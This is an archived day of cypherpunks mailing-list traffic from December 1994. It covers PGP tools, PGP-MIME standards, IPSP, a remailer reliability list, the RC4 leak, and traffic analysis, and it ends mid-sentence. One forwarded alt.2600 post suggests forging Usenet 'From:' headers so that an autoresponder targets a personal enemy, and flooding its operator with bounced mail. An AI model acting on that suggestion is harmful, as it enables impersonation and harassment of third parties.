apgp22b2_1.uue Autopgp 2.2b2 offline mail packet processor. Automates PGP functions. Part 1 of 4 BETA apgp22b2_2.uue Autopgp 2.2b2 offline mail packet processor. Automates PGP functions. Part 2 of 4 BETA apgp22b2_3.uue Autopgp 2.2b2 offline mail packet processor. Automates PGP functions. Part 3 of 4 BETA apgp22b2_4.uue Autopgp 2.2b2 offline mail packet processor. Automates PGP functions. Part 4 of 4 BETA help This file. key Sam Kaplin's PGP Public keys. pgpfaq Frequently asked questions about PGP. wherefaq Where to obtain PGP. ============================================================================== Diplomats are just as essential to starting a war as soldiers are for finishing it.... You take diplomacy out of war, and the thing would fall flat in a week. - Will Rogers ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: This message digitally signed to verify the identity of the sender iQEVAwUBLvVid8lnXxBRSgfNAQFk1Af+Ix3SV47MpM4mATQIU6aF3mD55d4yYziC dAcR6Hz6IblNWPA+7COfu+mSrTuwpmgQmCdsLU68hniCeuT+HAp9911q5hQsqfig mBZQ2ttQXUJ6fRFtEsWrm+xD74V7J4IhhzKU2Yj/bUpYbE0hZP5wlufoZ1/ghRy6 /pQqxzaU+UGY77SceS4TXrBc1Sg8lQqiwIWVunAg1plz+t6Dxni65UQNh5hAqika v87qxp0aXXjjLDzil+NBPHimpPSEvikZ9iEkAYTMIMG7WkUCz3Hdl5j8nBAXvhcK 5xbA8OGsvJ5mUWqJ3Va+2bNhaX8xoWiBME7OKPYXhw9JUeRXwLTc2Q== =rdLv -----END PGP SIGNATURE----- From j.hastings6 at genie.geis.com Mon Dec 19 09:41:31 1994 From: j.hastings6 at genie.geis.com (j.hastings6 at genie.geis.com) Date: Mon, 19 Dec 94 09:41:31 PST Subject: Karl Hess - L.A. area meeting Message-ID: <199412191741.AA201158861@relay2.geis.com> -----BEGIN PGP SIGNED MESSAGE----- "Extremism in the defense of liberty is no vice, and let me remind you, moderation in the pursuit of justice is no virtue." -- Karl Hess Meeting at Cheviot Hills (in Los Angeles) CALIFORNIA U-S-A- I will leave town right after this meeting -- to visit relatives and possibly attend this year's RSA conference January 9-11. The following text was written by SEK3 (with notes by JKH): --- K A R L H E S S C L U B --- REVOLUTION, REACTION or BETRAYAL? A Special 3-Part Post Election Series Monday, December 19, 1994 (That's tonight, yikes!) PART 2: ANARCHIST ALTERNATIVES DINNER at HASMIK'S Family Restaurant, 9824 National Blvd. In Cheviot Hills Center, National Exit from Santa Monica (10) Freeway. (310) 204-1591. Separate checks -- order from very reasonable menu. Beer and wine available. PROGRAM 8 p.m. Announcements * 8:15 Featured speakers * Questions and Answers (moderated by the speaker) * Special Series Opening and Closing by SEK3 * Official Meeting Close at 10 p.m. After-meeting until... ANARCHIST ALTERNATIVES ...and alternative anarchists. Agorists, Discordians, anarcho- syndicalists and punks -- cypher and rock. Does "dropping out" of the hopeless aboveground political system mean less activism -- or more? Is it time to move from the back-room to the coffeehouse? - From the conference committee room to the Usenet? Does feminism mean sharing the same oppression experienced by most males? Does voting for socialism mean bureaucratic capitalism and does voting for free enterprise mean profit...for bureaucrats? Did you vote for change last month...and get betrayed already? Are you ready to get angry...or get even? Or just get something done! If so, come and hear our panel of real alternatives: from (De)center, IWW, and the new improved and revitalized Movement of the Libertarian Left. Find out what's already going on all around you. At Hasmik's in Cheviot Hills (West L.A.). Make sure you are on our mailing list to get the postcard giving you the details! Call (310) 289-4126 or send your mail drop to KHC c/o AI, 291 S. La Cienega Blvd., #749, Beverly Hills, CA 90211. (Or e-mail to j.hastings6 at genie.geis.com) - JKH Same time and place, next month: 3. Monday, January 16, 1995 "THE NIGHT OF JANUARY 16TH" What have the Objectivists been up to since the death of Ayn Rand? Successors, institutes, new associations...some of whom are actually eager to dialog with libertarians and others. Have they something new for us to consider? Should we go back to our philosophical roots first before wasting more time on inherently impossible solutions? Is A still A? On this most special night for objectivists, come and find out. Kent - j.hastings6 at genie.geis.com (story.com will be repaired over the next few weeks, and I'll be outahere). -----BEGIN PGP SIGNATURE----- Version: 2.3 iQCVAgUBLvVPyA4ciVn87Ra9AQHRfQP9Hiq8Q/sPlqHHDkdam7dA9xrD3KlyeS2A tnb9KyyKygfpacxFEkZ9trjPY+hB++hVikASJ5VxE0OwVIMYI4uyotYNZfcgXnmr YKsxpALqWVtTRKPnYjKGaTi8UppiJKUm2na0OQ95Xnh5V8gRqn8pbY55ZEzTpkxb oVicdOf3IsM= =cYKl -----END PGP SIGNATURE----- From JLICQUIA at mhc.uiuc.edu Mon Dec 19 10:20:46 1994 From: JLICQUIA at mhc.uiuc.edu (JEFF LICQUIA (CEI)) Date: Mon, 19 Dec 94 10:20:46 PST Subject: PGP-MIME spec (No Flames Allowed!) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Disclaimer: This document assumes that MIME is an OK thing and a possible tool for bringing crypto to the masses. It does not assume anything about the current state of affairs concerning MIME mailers; rather, it serves as a possible impetus for code. Critical posts of a non-technical nature ("MIME sucks, you moron!") will be ignored. Watching the MIME flame wars, I was intrigued by the references quoted concerning PEM-MIME and so on, leading me to a great deal of research with an eye to writing some PGP-MIME kinds of tools. In doing this, I happened upon a post by Mr. Borenstein in comp.mail.mime stating, in effect, that the previous draft standard of application/pgp was a dead end. I also noticed that Mr. Borenstein called for volunteers to write a draft standard to integrate PGP into the PEM-MIME scheme developed at the last IETF meeting. This seems like a golden opportunity to give mail vendors a "push" to integrate PGP with their mailers, so I thought I'd mention it here in case someone was interested who might have missed the comp.mail.mime post. I've noticed Mr. Borenstein's presence here in cypherpunks; I invite him to clarify or update as needed. I'd also volunteer to work on the draft, except that my qualifications to do so are about as low as you get on a list like this one, and I'm sure that just about anyone else would probably be more qualified. However, if no one else is interested, I'll do what I can! -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvWezjER5KvPRd0NAQF+CwP8DpQlFv/VtZ4N02nUfnklIsoT/63qvnBG E0H2d/juUtK6Op4hcwexGlxF5fm7KDyMFXCYyvogQ2c8UxI1wcR5fGXZVpmNSRwk K8xhIX96jZRrI7ZyG4M5uhCXwgmXN2KM7bldgJscezOdUcINFoa8QGSCBNSZOhdD urFUFVyvwzM= =TAD0 -----END PGP SIGNATURE----- From bshantz at spry.com Mon Dec 19 10:25:03 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Mon, 19 Dec 94 10:25:03 PST Subject: IPSP Message-ID: <199412191825.KAA05231@homer.spry.com> For the sake of a friend, I'm trying to explain the basics of IPSP. And I've choked!!! Could someone please explain it. What is it, how does it work. ETC. -- Brad From skaplin at skypoint.com Mon Dec 19 10:29:58 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Mon, 19 Dec 94 10:29:58 PST Subject: Any suggestions for additions to this? In-Reply-To: <199412191310.AA18060@ideath.goldenbear.com> Message-ID: <0YPzkKjqRqoN075yn@skypoint.com> -----BEGIN PGP SIGNED MESSAGE----- > [BEGIN PGP SIGNED MESSAGE] > To: skaplin at skypoint.com > >All binary files are UUENCODED with PGP signatures. > > Hmm, what about using PGP instead of UUENCODE, if they're going > to be signed anyway? > I'm working on the lowest common denominator theory. Maybe they have PGP set up...maybe they don't. If they do then they can verify the signature. If they don't they still will have uudecode on their system and can access the file. Nothing frustrates me more than trying to get a file only to find out unexpectedly I need something else to access it. Sam ============================================================================== Laughter is the shortest distance between two people. - Victor Borge ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: This message digitally signed to verify the identity of the sender iQEVAwUBLvWadMlnXxBRSgfNAQESogf+LeRglKrHlcZFSJh5FFt9L2tB+aG2lZe2 MeIgQUN7rzTlxupVECB2wmV7N8a3ep6rw04VGif32sVBLXaY3H0J6fbNklYultu8 TEuSVfVEwVCOVXvIZzR1Mtze1YzAXxXKhBomWHsBc+wGa4N4cXqYsbbouPZhI2P4 osyxEr8z/bNVT0T2g1EIl/fBN4l1TUqKrEZoxh51bXU2UcKG1oXbqtdStz6+tFii DF3IssZABiG5sNbWu8/QAcyWrzngitRs1R5W6nCeHxUMbK4mqRj1t6sgBvs/gVLy IedQ2AjoPeTkQCQH2/EzRWx+0bdKs0BfsMkZKxGlsxxDSNsFuZNW0Q== =szlp -----END PGP SIGNATURE----- From raph at CS.Berkeley.EDU Mon Dec 19 10:30:20 1994 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 19 Dec 94 10:30:20 PST Subject: List of reliable remailers Message-ID: <199412191450.GAA03870@kiwi.CS.Berkeley.EDU> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.bsu.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"vox"} = " cpunk pgp. post"; $remailer{"avox"} = " cpunk pgp post"; $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"rebma"} = " cpunk pgp hash"; $remailer{"jpunix"} = " cpunk pgp hash latent cut post ek"; $remailer{"c2"} = " eric pgp hash"; $remailer{"soda"} = " eric post"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub"; $remailer{"usura"} = " cpunk pgp. hash latent cut post"; $remailer{"desert"} = " cpunk pgp. post"; $remailer{"nately"} = " cpunk pgp hash latent cut"; $remailer{"xs4all"} = " cpunk pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk pgp hash latent cut post ek"; $remailer{"rahul"} = " cpunk"; $remailer{"mix"} = " cpunk hash latent cut ek"; $remailer{"q"} = " cpunk hash latent cut ek"; catalyst at netcom.com is _not_ a remailer. Last ping: Mon 19 Dec 94 6:00:03 PST remailer email address history latency uptime ----------------------------------------------------------------------- usura usura at replay.com +***++*+**** 7:47 99.99% alumni hal at alumni.caltech.edu *+*****+**** 4:24 99.99% c2 remail at c2.org +++-+++++-++ 41:24 99.99% penet anon at anon.penet.fi *****+*+**** 29:39 99.99% nately remailer at nately.ucsd.edu ++++++.+++++ 1:29:04 99.99% portal hfinney at shell.portal.com ************ 2:19 99.99% flame tomaz at flame.sinet.org ***+-++**+* 8:57 99.99% ideath remailer at ideath.goldenbear.com *-*++**+**** 11:44 99.97% bsu-cs nowhere at bsu-cs.bsu.edu -**++******* 5:59 99.96% mix mixmaster at nately.ucsd.edu **+++*.+++++ 1:26:32 99.96% desert remail at desert.xs4all.nl .--------.-- 14:21:48 99.99% jpunix remailer at jpunix.com ** +-++**+* 8:35 99.78% q q at c2.org *-+--++ 49:41 99.79% vox remail at vox.xs4all.nl --..-----. 17:07:50 99.99% rahul homer at rahul.net ****** ****+ 10:59 99.50% soda remailer at csua.berkeley.edu ._........ 10:05:18 99.41% xs4all remailer at xs4all.nl ****+ +**** 8:09 99.10% rebma remailer at rebma.mn.org *---___..-.- 30:10:54 82.77% extropia remail at extropia.wimsey.com -.-+ 5:00:06 27.26% For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). Options and features cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. oldpgp Remailer does not like messages encoded with MIT PGP 2.6. Other versions of PGP, including 2.3a and 2.6ui, work fine. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. special Accepts only pgp encrypted messages. ek Encrypt responses in relpy blocks using Encrypt-Key: header. Comments and suggestions welcome! Raph Levien From skaplin at skypoint.com Mon Dec 19 10:30:20 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Mon, 19 Dec 94 10:30:20 PST Subject: Automated Witchhunt: I've been slandered by a script. In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article , you wrote: > > > > It seems then that someone is running a process which looks for posts to > alt.2600, and then automates the above response, original post attached, > to warn off system admins, fight crime, save the day, etc. etc. > Either that or Lance is bored again. Hi Uni, I found this in alt.revenge and it may have something to do with your problem. I didn't follow all of it, but then again I don't subscribe to alt.2600. Sam Path: skypoint.com!winternet.com!interactive.net!news.sprintlink.net!howland.reston.ans.net!gatech!n From: crk_test at guiness.ucns.uga.edu (Danhiel "Deviant?" Baker) Newsgroups: alt.2600,alt.revenge Subject: Thanks Cracker Buster! Date: 17 Dec 1994 17:16:24 GMT Organization: Beyond the Mists Lines: 27 Sender: crk_test at guiness.ucns.uga.edu Message-ID: <3cv6d8$mos at hobbes.cc.uga.edu> NNTP-Posting-Host: sb.dcs.uga.edu Approved-By: Derkhil CatSpawn Originator: dbaker at sb.dcs.uga.edu Xref: skypoint.com alt.2600:41189 alt.revenge:4501 It's surprising to me that no one else has touched on this before; it'd seem the natural thing for those that read 2600. While the automated messages are rather annoying when you are making a "legit" post, you can use this 'service' that Cracker Buster is providing for a bit of net-revenge. News is easy to forge - the spammer demonstrated that quite handily - and providing a new 'From:' line to a post that points to your favorite net- nemesis. Some on alt.2600 are pro'ly already doing a similiar switch in order to mis-direct the autoresponses and save themself a headache. With a little thought I'm sure that you could generate quite an interesting post that will have their sysadmin suspicious quite quickly. Just a thought... For all of his hypocritical "goods intentions", Cracker Buster has provided another method to cause all of that damage/destruction/evil/traffic stoppage that he accuses us of. *grin* No, I wouldn't actually suggest that you mis-direct the auto-replies in a malicious way; a couple of "legit" ideas along this line would be to screw-up your 'From:' line so that Cracker Buster gets a mailbox full of returned-mail-bad-address (this I *do* suggest, naturlich!) and to add your own 'Really-From: realme at real.address.com' line with your correct address so that ppl that _really_ want to get in touch with you can. Some variation on the line would be advised -- no need to make it easy for his responder to handle. Take a look at the headers on CB's apology post for more ideas and suggestions. Pro'ly need a "Sender:" line as well; I'll know exactly after this post goes thru. Danhiel ============================================================================== Doctors are just the same as lawyers; the only difference is that lawyers merely rob you, whereas doctors rob you and kill you too. --Anton Chekhov-- ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: This message digitally signed to verify the identity of the sender iQEVAwUBLvWaWclnXxBRSgfNAQGNvwf9HyB5p5HtZhYWytQfFfBErf5XhFVrC/WZ OUfaNbz66XpsAiYVPPuVewH8p5gIDEvS/rqkrZB2QvnekcgsiEcjZgwQHQQDz2rk T+pbj8niz+s6RY7phauXyIRVA2Uve2y0EPvnmvUgBkiythW3rff0PuB0yWV0QpxK PfeNnMPZRB9cMfYr4sPerceKu64ttp9sDitxJNeNKJYrS5m1oU5vvjW1/c03r+5n C7Blulhc4BNMOqWjbWP7+TjoIl+qaXqgnkDToVCt8ZAOCW8v4ANKRnyC3El8K1rb fdlpAW0WIs5OU4dqbl4ay6OQi2EbMKcYcD1THU3dNOPBILk4xxQgSA== =LKp0 -----END PGP SIGNATURE----- From TBKLU at bebop.tt.luth.se Mon Dec 19 10:32:13 1994 From: TBKLU at bebop.tt.luth.se (Karl Lundkvist) Date: Mon, 19 Dec 94 10:32:13 PST Subject: Pgp in Europe Message-ID: <1DB8505345B@bebop.tt.luth.se> Does anyone know a way to get Pgp 2.6.2 by ftp, mail or something in Europe? All I can find that I'm allowed to download from the net is 2.3... I suppose this is because of those silly american crypto-laws, but but I've seen europeans using the later versions, so they can't be that hard to get. Karl Lundkvist From ddt at lsd.com Mon Dec 19 10:32:39 1994 From: ddt at lsd.com (Dave Del Torto) Date: Mon, 19 Dec 94 10:32:39 PST Subject: FTP: qwerty site gone, crypto files needed Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Michael Paul Johnson and I are wondering what happened to . He's apparently dropped his Netcom account and thus the handy Crypto-related files he used to keep there are not available to the world. If anyone has any idea of the whereabouts of Mr. Qwerty and/or his files, please contact me at and fill me in, so I can arrange to put the files back up in my FTP directory as a public service and so Mike can update his "Where to get PGP" FAQ to reflect the new site. Thanks, dave -----BEGIN PGP SIGNATURE----- Version: 2.6ui iQCVAgUBLvWIHaHBOF9KrwDlAQHWnQP8CNryjUdBdMhPH8BtHEyH/DKVJYhMM/eT 1l8XfuXWXmcLnp5V669h+jeVM5sRU460Px/2KuCqs5uVdeMhsLnkH0A63213OcxK HSyaHMReHG8XKMaByd+q7mdc4+d6X4637yionJDLCCDduODVKTY/rTxu88l3OtJ/ 5YFjsqK1oa4= =1jkK -----END PGP SIGNATURE----- From scotts at uvsg.com Mon Dec 19 10:34:04 1994 From: scotts at uvsg.com (SCOTT STADELI) Date: Mon, 19 Dec 94 10:34:04 PST Subject: FW: The NEXUS-Berkeley Presents: a New Years Party Message-ID: <2EF59312@smtpmail.uvsg.com> ---------- From: owner-cypherpunks To: nexus-berkeley Subject: The NEXUS-Berkeley Presents: a New Years Party Date: Sunday, December 18, 1994 5:18 >around the continent. (I would include here the Australian sites but >that would require that the party start approx. 7 AM on the 31st...) You say that like it would be a _bad_ thing. From jrochkin at cs.oberlin.edu Mon Dec 19 10:39:28 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Mon, 19 Dec 94 10:39:28 PST Subject: cypherpunks mentioned in Z Magazine Message-ID: There was an article in Z Magazine about the RC4 disclosure, and IP and information in general on the internet, in which the cypherpunks were mentioned. They got a lot of information confused about cypherpunks, but over all it was an interesting article. Here's the first portion of the article, in which cypherpunks were given prominence. If anyone wants to write them and clear up their confusion between anonymous remailers and mailing lists, or other errors about the 'punks (which generally cast us in a worse light then we should be), their address is: Z Magazine 18 Millfield St Woods Hole, MA 02543 ******** Pandora's Mailbox; RC4 a secret no longer by Mark Chen On September 9 there appeared on the Cypherpunk's Internet mailing list a short piece of computer code purporting to be RSA Data Security's secret RC4 cipher algorithm. RC4 is one of the most widely used commercial ciphers, but its internals have for years been a guarded trade secret--a status that changes within hours, as the program fragment, which simple tests revealed to be the genuine article, traversed the the farthest corners of the Net via e-mail, bulletin boards, and file transfer. State Department export regulations, as well as intellectual property laws, were smoothly rendered moot. As Cypherpunks founder Tim May says, "National Borders are just speed bumps on the information superhighway." Soon after RC4 hit the Net, RSA Data Security (RSADSI) issued a statement that read in part: "It has come to RSA Data Security's attention that certain RSA trade secrets, in the form of confidential and propietary source code, have been misappropriated and disclosed..." "...Not only is this act a violation of law, but it's publication is a gross abuse of the Internet. RSA has begun an investigation and will proceed with legal action against anyone found to have violated its intellectual property rights." Setting aside the questionable legal basis of these threats, why doesn't RSADSI bring charges against the person who originally released the code? The answer is that they don't know who did it. The code was distributed through a mechanism called a "mailing list," a system that distributes e-mail to people who have signed up to receive messages on a given topic. For example, if you were interested in fish, you might sign up for an aquarium hobbyists' list. People could then send email to the list server, and the e-mail would be forwarded to everyone on the list. RC4 was posted to the Cyperpunks "anonymous remailers" list. When an anonymous remailer receives a message, it strips off all of the sender information and remails the message under an anonymous pseudonym. Thsi effectively breaks the link between sender and recipients, and makes tracing impossible. The intended purpose of these remailers is to allow free distribution of various intellectual "commodities" whose distribution is ordinarily discouraged by law or custom. A Cypherpunk faction called the Information Liberation Front has long used anonymous remailing to distribute inaccessible, expensive, copyrighted literature. Moreover, the remailers serve as technological guarantee of the right to free speech. They allow unpopular opinions to be voiced, while protecting the authors of those opinions from retribution. Far from being a "gross abuse of the Internet," as RSADSI maintains, the distribution of RC4 was a case of the Internet doing what it does best--propogating ideas. While this act may or may not have been a violation of human-made laws, it was a faithful exercise of the natural laws of information flow... [etc etc] From perry at imsi.com Mon Dec 19 10:50:24 1994 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 19 Dec 94 10:50:24 PST Subject: PGP-MIME spec (No Flames Allowed!) In-Reply-To: Message-ID: <9412191850.AA07233@snark.imsi.com> "JEFF LICQUIA (CEI)" says: > with an eye to writing some PGP-MIME kinds of tools. In doing this, I > happened upon a post by Mr. Borenstein in comp.mail.mime stating, in > effect, that the previous draft standard of application/pgp was a dead > end. It is a dead end. Look at the current PEM/MIME drafts for the new security multiparts format. Its been accepted by the working group and is on its way to draft standard. Perry From perry at imsi.com Mon Dec 19 10:52:12 1994 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 19 Dec 94 10:52:12 PST Subject: IPSP In-Reply-To: <199412191825.KAA05231@homer.spry.com> Message-ID: <9412191851.AA07244@snark.imsi.com> bshantz at spry.com says: > For the sake of a friend, I'm trying to explain the basics of IPSP. > And I've choked!!! Could someone please explain it. What is it, > how does it work. ETC. Simplified, the idea is that you put a cryptographic encapsulation around your packets and then send them inside other IP packets; the receiver unwraps them and unencrypts them. I'll send sections of my draft if anyone wants to hear more on the topic. Perry From jamesd at netcom.com Mon Dec 19 11:15:02 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 19 Dec 94 11:15:02 PST Subject: (fwd) Re: Content-Type of application/pgp Message-ID: <199412191913.LAA08602@netcom8.netcom.com> Xref: netcom.com comp.mail.mime:5131 Path: netcom.com!ix.netcom.com!howland.reston.ans.net!agate!library.ucla.edu!csulb.edu!paris.ics.uci.edu!ucivax!gateway From: nsb at nsb.fv.com (Nathaniel Borenstein) Subject: Re: Content-Type of application/pgp Message-ID: <0iv6J0H0Eyt5I2gP0o at nsb.fv.com> In-Reply-To: <3blaqd$fgn at wegener.ems.psu.edu> Newsgroups: comp.mail.mime Lines: 17 References: <3blaqd$fgn at wegener.ems.psu.edu> Date: 12 Dec 94 15:01:06 GMT After several discussions over the last few weeks -- with Phil Zimmerman, Jim Galvin, Ned Freed, and others at Email World and IETF -- I have reached the conclusion that the application/pgp type should be ABANDONED in favor of an approach based on multipart/security. My application/pgp Internet Draft is expiring shortly & will not be renewed. By using multipart/security, we can work towards a greater level of harmony between the PEM and PGP communities. It also now appears that there's a chance that PEM and PGP keys can be made interoperable, which would be a huge win. I don't want anyone to think I'm standing in the way of this convergence, so I wanted to publicly state that I have abandoned my application/pgp Internet Draft. What we need now is for someone to work up a new draft on how to use PGP inside of multipart/security. I'm swamped. Any volunteers? -- Nathaniel -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From cactus at seabsd.hks.net Mon Dec 19 12:01:28 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Mon, 19 Dec 94 12:01:28 PST Subject: Name that phone Message-ID: <199412192001.PAA24713@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- I like: "Pretty Good Phone". Keep the "PGP" motif. - -- Todd Masco | "'When _I_ use a word,' Humpty-Dumpty said, in a rather cactus at hks.net | scornful tone, 'it means just what I choose it to mean - cactus at bb.com | neither more nor less.'" - Lewis Carroll - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvXmjyoZzwIn1bdtAQHtMQF/eHqzFBvL1rVgDuuZQ7DbjA3Suwpe8FDF oXhwHxwgP/uiJFr/cNV+ovOrkZ5Zzg+m =9aqH -----END PGP SIGNATURE----- From jrochkin at cs.oberlin.edu Mon Dec 19 12:04:46 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Mon, 19 Dec 94 12:04:46 PST Subject: List of reliable remailers Message-ID: At 9:50 AM 12/19/94, Raph Levien wrote: > eric > A variant of the cpunk style. Uses Anon-Send-To: instead. Question: Are there in fact any remailers out there that _don't_ take Request-Remailing-To:, but only Anon-Send-To:? That is, are there in fact any "eric" remailers, according to Raph's criteria? I've used at least one of the remailers that's labled as "eric" on Raph's list, and used "Request-Remailing-To:" with it, and been succesful. I'm wondering if this is the case for all of them. From raph at CS.Berkeley.EDU Mon Dec 19 12:28:57 1994 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 19 Dec 94 12:28:57 PST Subject: List of reliable remailers In-Reply-To: Message-ID: <199412192028.MAA05164@kiwi.CS.Berkeley.EDU> Jonathan Rochkind writes: > At 9:50 AM 12/19/94, Raph Levien wrote: > > eric > > A variant of the cpunk style. Uses Anon-Send-To: instead. > > Question: > Are there in fact any remailers out there that _don't_ take > Request-Remailing-To:, but only Anon-Send-To:? That is, are there in fact > any "eric" remailers, according to Raph's criteria? > > I've used at least one of the remailers that's labled as "eric" on Raph's > list, and used "Request-Remailing-To:" with it, and been succesful. I'm > wondering if this is the case for all of them. I classified c2 as an "eric" remailer because it has normal handling of subject lines with Anon-Send-To but not with Request-Remailing-To. I think it kept the subject line even when the message was encrypted. This is a big hole for traffic analysis. Raph From lmccarth at ducie.cs.umass.edu Mon Dec 19 12:51:35 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Mon, 19 Dec 94 12:51:35 PST Subject: Pgp in Europe Message-ID: <199412192056.PAA25273@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Karl Lundkvist writes: > Does anyone know a way to get Pgp 2.6.2 by ftp, mail or something in > Europe? All I can find that I'm allowed to download from the net is > 2.3... The U.S. govt. doesn't want you to get PGP from the U.S., but you are (presumably) not a U.S. resident or citizen, so U.S. laws don't apply to you. As long as _Swedish_ law doesn't bar you from importing strong cryptography into Sweden, you can grab PGP from wherever you like. -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvXyIWf7YYibNzjpAQGY+gP/ZxIH2glPB4RVz+kDjQj4FvxLGxTd3qMk mMbaFyMS5sfDV8tcmkSK4Ll5FWZwT2jede4JYXov/nbr8gIAjcTAvD0ejtJzyYxK FQx+nf9JUr2wViLU+6gm86ea1y7sH/wHjMNhnfwLxh50G9KenZZW+Od5Jzw/t8tR +qcaUwNGDfg= =OUBK - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvXzayoZzwIn1bdtAQGDZQGAlQQ3P9X513paHxgmDwh84u1KmNJR9aUZ 3XMHg0Jl08FELed6hI8XJUUXep1y4DK8 =MATE -----END PGP SIGNATURE----- From rishab at dxm.ernet.in Mon Dec 19 13:23:17 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Mon, 19 Dec 94 13:23:17 PST Subject: Envelopes speak - tracking information flow Message-ID: Re traffic analysis, cpunk remailers, DC-nets. Electric Dreams Weekly column for The Asian Age by Rishab Aiyer Ghosh #41, 19/December/1994: Envelopes speak - tracking information flow Digital communication is extremely vulnerable to interception, sorting and archival. Current electronic mail systems offer less privacy than open messages on postcards - at least it's impractical to keep copies of enormous quantities of paper mail. Encryption, which is slowly gaining popularity as a means of ensuring a degree of privacy of e-mail and eventually voice communication, is analogous to letters in sealed envelopes. This protects against one invasion of privacy - of communication content, or what you write and read. However there is at present little protection against a possibly more serious invasion of privacy, that of communication context, or to whom you send and from whom you receive messages. As such messages can include anything from New Year greetings to a friend to contract negotiations to CD purchases, there is a lot that can be known about you from addressing details on the most secure, encrypted mail - the tale the envelopes tell. Currently, whether you make a phone call or send an e- mail, your communication is routed through a host of different sites - telephone exchanges or computers around the world. It may not be technically possible for these sites to extract the content of your message because of encryption. It is not feasible, and usually illegal, for them to archive traffic. But it is very easy to archive routing information, and such logs are routinely kept by computers on the e-mail network as well as telephone exchanges. The legal process of getting access to addressing information is much simpler than for intercepting communication content itself, because it is often assumed that such information is, on its own, useless. Actually it is probably more useful than interception. Such traffic analysis helped track Iranian assassins in France earlier this year, using records of 20,000 phone calls from public booths. It could also be used for intrusive monitoring of your income or hospital visits, or for that matter to crack down on Tibetan human rights activists. Cypherpunks - the assorted citizens of cyberspace who try to protect privacy through the use of technology - may have a solution. Elated by the success of anonymous remailers - special e-mail addresses that repost messages after removing any traces of the original sender, especially favoured in discussion forums for victims of sexual abuse - they are now working on methods to reduce, if not eliminate altogether, the menace of traffic analysis. Without these, it would be possible to associate anonymous messages with their original senders by carefully matching arrival times in various system logs. Remailers and their users resort to several countermeasures. They collect incoming mail and repost anonymized versions in batches of random sizes, to avoid a correlation between mail arrival times. They route mail through random groups of remailers, often in different countries, to make tracing posts back to the source harder. And of 